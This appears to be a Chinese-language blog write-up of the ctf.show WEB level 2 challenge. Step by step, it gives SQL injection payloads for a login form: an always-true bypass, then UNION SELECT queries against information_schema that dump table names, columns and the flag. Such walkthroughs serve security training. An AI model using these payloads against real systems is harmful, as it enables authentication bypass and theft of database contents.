ctfshow-WEB-web2

ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可

 ctfshow-WEB-web2_第1张图片

 

在用户名的输入框中输入万能账号 a' or true #,密码随便输

ctfshow-WEB-web2_第2张图片

 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库

ctfshow-WEB-web2_第3张图片

 

首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,2,3 #

 ctfshow-WEB-web2_第4张图片

 

接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中

a' union select 1,database(),3 #

ctfshow-WEB-web2_第5张图片

 

数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输

a' union select 1,
(select group_concat(table_name) from information_schema.tables
where table_schema='web2')
,3 #

ctfshow-WEB-web2_第6张图片

 

接下来获取flag表的字段

a' union select 1,
(select group_concat(column_name) from information_schema.columns
where table_schema='web2' and table_name='flag')
,3 #

ctfshow-WEB-web2_第7张图片

 

接下来获取flag表的数据

a' union select 1,(select flag from flag),3 #

ctfshow-WEB-web2_第8张图片

将flag的内容整体复制到输入框中即可过关 

你可能感兴趣的:(通关教程,网络安全,渗透测试)